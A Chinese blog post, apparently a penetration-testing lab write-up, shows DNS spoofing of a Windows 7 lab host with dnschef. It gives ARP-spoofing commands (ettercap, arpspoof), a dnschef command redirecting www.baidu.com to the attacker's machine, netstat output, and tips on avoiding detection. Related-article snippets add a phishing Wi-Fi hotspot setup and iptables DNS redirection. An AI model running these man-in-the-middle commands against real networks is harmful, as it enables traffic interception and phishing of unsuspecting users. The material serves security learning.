DNS欺骗【下】----dnschef实现

最新推荐文章于 2023-11-18 08:45:00 发布
最新推荐文章于 2023-11-18 08:45:00 发布
阅读量2.6k 收藏 7
点赞数 1
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/redwand/article/details/105495873
版权
一、dnschef实验环境

在这里插入图片描述

二、操作步骤

1、在kali上开启arp欺骗(二选一)

ettercap -T -Q -M arp:remote -i eth0 /10.10.10.135// /10.10.10.2//

arpspoof -t 10.10.10.135 -r 10.10.10.2

2、在kali上开启dnschef命令

dnschef --fakeip=10.10.10.136 --fakedomains=www.baidu.com -q --interface=10.10.10.136

此命令相当于在DNS服务器中加入一条以下A记录

www.baidu.com  A  10.10.10.136

此时netstat命令,发现python(dnschef)开启了53端口

root@kali2020:~# netstat -anput
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      608/sshd
tcp        0     36 10.10.10.136:22         10.10.10.1:54952        ESTABLISHED 3526/sshd: root@pts
tcp6       0      0 :::22                   :::*                    LISTEN      608/sshd
udp        0      0 10.10.10.136:53         0.0.0.0:*                           5122/python3
udp        0      0 10.10.10.136:68         10.10.10.254:67         ESTABLISHED 552/NetworkManager
udp        0      0 0.0.0.0:69              0.0.0.0:*                           593/inetutils-inetd

3、在win7上DNS设置自动获取,得到10.10.10.2,此时ping www.baidu.com发现并没有解析到10.10.10.136,说明我们在使用dnschef工具时候,必须在客户端DNS配置设置10.10.10.136(kali)为DNS服务器,此时才能顺利得到www.baidu.com–>10.10.10.136的dns劫持需要的解析记录。具体报文(点击下载)
在这里插入图片描述
4、此过程的图示如下
在这里插入图片描述

三、ettercap与dnschef对比

经过对比,很明显ettercap使用dns_spoof插件的情况明显比dnschef好用,dnschef使用时多了一步在客户端的DNS服务器设置步骤,且其开放了53端口,更容易被目标发现。

redwand
关注
专栏目录
最新kalidnschef
vanony的博客
01-20 1011
描述:   DNSChef是针对渗透测试人员和恶意软件分析师的高度可配置的DNS代理。 它能够精细配置哪些DNS回复以修改或简单地代理真实响应。 为了利用该工具,您必须手动配置或破坏DNS服务器条目以指向DNSChef。 该工具需要root特权才能在特权端口上运行。 选项参数: -h,--help 显示帮助信息并退出 --fakedomain thesprawl.org.google.com 以逗号分隔的域名列表,将解析为上述参数中指定的FAKE值。 所有其他域名将解析为其真实值。 --truedo
Kali Linux 如何搭建钓鱼WIFI(图文炒鸡详细)
热门推荐
zegeai的博客
11-18 1万+
0x00 将网卡切换到监听模式并创建热点 airmon-ng start wlan0 这里是建立监听模式 如果出现wlan0mon则表示成功! 接下来创建热点 airbase-ng -e Free-wifi-5G -c 11 wlan0mon 如果出现以下,则表示创建热点成功,注意窗口不要关!!! 但是这个时候手机可以搜到名为“Free-wifi-5G”的热点且无法连接,是因为没有分配IP 0x01 建立虚拟网卡并打开IP转发功能 首先重新打开一个终端,之前那个终端一定不要关!!! 这一步的意义是将这
dnschef实现dns欺骗
04-13
DNS欺骗【下】----dnschef实现 https://blog.csdn.net/redwand/article/details/105495873
使用kali里的dnschef进行DNS欺骗
qq_33163046的博客
06-06 4364
本文使用kali自带的DNSChef工具做DNS欺骗,工具成功生效了
dnschef进行DNS欺骗
嘟的博客
10-26 2007
title: dnschef DNS欺骗 tags: 中间人攻击 categories: 渗透测试 dnschef --fakeip=192.168.200.2 --fakedomains=www.baidu.com,www.qq.com --interface 192.168.200.243 -q fackip欺骗到指定的ip,facedomains欺骗域名 window修改dns服务器 ...
DNSChef的使用
xiaoxuetu_的博客
07-25 8255
DNSChef是一种在Python中开发的跨平台应用程序。 一、设置DNS代理 1.首先将计算机设置为使用DNS名称服务器工具。 Linux: vim /etc/resolv.conf nameserver 127.0.0.1(如果在本地运行) Windows: 控制面板\所有控制面板项\网络和共享中心 属性--TCP/IPv4 二、运行DNSChef 查询一个域的
DNS欺骗攻击2(结合dnschef
robacco的博客
09-23 809
实验步骤 1、开启Linux的ip包转发功能 echo 1 > /proc/sys/net/ipv4/ip_forward 2、使用iptables建立一个规则,该规则的功能是把所有截获到的DNS请求报文转发到本机的UDP 53 号端口 iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j REDIRECT --...
dnschef --fakeip 192.168.1.100 --fakedomains example.com --file /path/to/malicious/dns/response
06-08
这是一个命令行工具,用于欺骗 DNS 解析请求。具体来说,它会将指定的域名解析请求重定向到指定的 IP 地址,并返回指定的恶意 DNS 响应。其中,--fakeip 参数指定了要欺骗的 IP 地址,--fakedomains 参数指定了要...
信安学习---day21-25
ekko_jay的博客
11-23 1391
网络安全
dnschef使用教程
09-13
DNSChef 是一款强大的 DNS 欺骗工具,可以帮助测试人员模拟 DNS 欺骗攻击,并捕获和修改网络流量。下面是使用 DNSChef 的简单步骤: 1. 安装 DNSChefDNSChef 是用 Python 编写的,可以通过 pip 安装。打开终端并...
dnschef-0.2.1
04-25
dnschef-0.2.1
dnschef-0.2.1.rar
09-30
dnschef-0.2.1.rar
KALIDNS解析工具——Dnschef参数(中英对照)
VMware, Windows, Linux, Cisco, Container, Kubernetes, Kali
03-20 1615
dnschef usage: dnschef [options]: _ _ __ | | version 0.4 | | / _| __| |_ __ ___ ___| |__ ___| |_ / _` | '_ \/ __|/ __| '_ \ / _ \ _| | (_| | | | \__ \ (__| | | | __/ | \
DNS欺骗实战
爱吃仡坨的Blog
08-04 757
DNS欺骗
DNSChef 为渗透测试人员和恶意软件分析师提供一个高度可配置的DNS代理
ResumeProject的博客
08-31 310
DNSChef旨在为渗透测试人员和恶意软件分析师提供一个高度可配置的DNS代理。
DNS欺骗攻击与Python实现
最新发布
Javachichi的博客
11-18 585
DNS欺骗攻击的原理就是攻击者伪装成DNS服务器,向受害者发送虚假的DNS响应,告诉受害者请求的域名对应的IP地址是攻击者自己控制的恶意网站的IP地址。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
DNS欺骗-教程详解
wzhua的博客
08-10 5637
DNS欺骗-教程详解,有环境下载链接
渗透测试专用DNS代理 - DNSChef
weixin_30849591的博客
01-29 368
DNSChef是一个高度可配置的DNS代理,用于渗透测试和恶意软件分析。DNS代理(又名“假DNS”),可用于分析用户间传输的网络流量。例如,我们可以使用一个DNS代理伪造所有到“badguy.com”的请求至本地计算机,进而对流量进行分析。 在最新的版本0.2中,引入了对IPv6的支持、大量新的DNS记录类型,自定义端口和其他常用的功能。 使用方法: 以root权限执行以下命令 # ...
DNS欺骗(转)
congjukun0600的博客
08-11 138
DNS欺骗(转)[@more@]DNS欺骗本文仅用于研究目的!与此相关所产生的一切作者概不负责! 【摘要】 DNS欺骗可以用来上BBS隐藏ip,但其作用远远不止这些。 【简述】 熟悉网络的人都知道,当客户向一台服务器请求服务时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值